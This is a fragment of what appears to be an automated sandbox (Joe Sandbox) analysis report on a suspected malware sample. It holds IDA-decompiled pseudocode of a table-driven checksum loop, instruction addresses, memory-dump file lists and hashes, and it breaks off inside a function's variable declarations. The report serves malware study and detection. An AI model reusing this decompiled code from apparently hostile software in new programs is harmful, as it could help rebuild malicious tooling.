^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t67 & 0x000000ff ^ (((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t66 & 0x000000ff ^ ((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t68 & 0x000000ff ^ ((((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t66 & 0x000000ff ^ ((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t67 & 0x000000ff ^ (((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t66 & 0x000000ff ^ ((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
                                                                          						_t61 =  &(_t68[1]);
                                                                          						_t98 = _t98 - 8;
                                                                          					} while (_t98 > 7);
                                                                          					goto L4;
                                                                          				}
                                                                          				return 0;
                                                                          			}














                                                                          0x0040805a
                                                                          0x0040805d
                                                                          0x00408060
                                                                          0x0040806a
                                                                          0x00408070
                                                                          0x00408075
                                                                          0x00408124
                                                                          0x00408126
                                                                          0x00408143
                                                                          0x00000000
                                                                          0x00408145
                                                                          0x0040812d
                                                                          0x0040813c
                                                                          0x0040813f
                                                                          0x00408140
                                                                          0x00408140
                                                                          0x00000000
                                                                          0x0040812d
                                                                          0x00408080
                                                                          0x00408092
                                                                          0x004080a5
                                                                          0x004080b8
                                                                          0x004080cb
                                                                          0x004080de
                                                                          0x004080f1
                                                                          0x00408104
                                                                          0x00408114
                                                                          0x00408117
                                                                          0x00408118
                                                                          0x0040811b
                                                                          0x00000000
                                                                          0x00408080
                                                                          0x0040814b

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b3d0b7e61a7e0f158f6548a92a2f43dbdbcd8d125c1078b28183cb31cd010d6
                                                                          • Instruction ID: 9c05cf5a85e7654c7ef1fb60a5b3b1c4a63033b36bcc4beae51a79014b3c43b6
                                                                          • Opcode Fuzzy Hash: 7b3d0b7e61a7e0f158f6548a92a2f43dbdbcd8d125c1078b28183cb31cd010d6
                                                                          • Instruction Fuzzy Hash: F63175313141761BCB1D8D2F94D01B67BD2A79B343389426AE8D2D72C5C928A926DBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 93%
                                                                          			E0040619A(void* __edx, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                          				void* _v16;
                                                                          				intOrPtr _v40;
                                                                          				int _v42;
                                                                          				char _v44;
                                                                          				void _v1068;
                                                                          				char _v1132;
                                                                          				intOrPtr _v1136;
                                                                          				intOrPtr _v1140;
                                                                          				intOrPtr _v1144;
                                                                          				intOrPtr _v1148;
                                                                          				intOrPtr _v1152;
                                                                          				intOrPtr _v1156;
                                                                          				intOrPtr _v1160;
                                                                          				intOrPtr _v1164;
                                                                          				void _v1228;
                                                                          				struct _SYSTEMTIME _v1244;
                                                                          				int _v1248;
                                                                          				void* _v1252;
                                                                          				intOrPtr _v1256;
                                                                          				void* _v1260;
                                                                          				intOrPtr _v1264;
                                                                          				void* _v1268;
                                                                          				CHAR* _v1272;
                                                                          				CHAR* _v1276;
                                                                          				void* _v1280;
                                                                          				signed int _v1284;
                                                                          				signed int _v1288;
                                                                          				intOrPtr _v1292;
                                                                          				signed int _v1296;
                                                                          				char _v1300;
                                                                          				void* _v1304;
                                                                          				intOrPtr _v1308;
                                                                          				CHAR* _v1312;
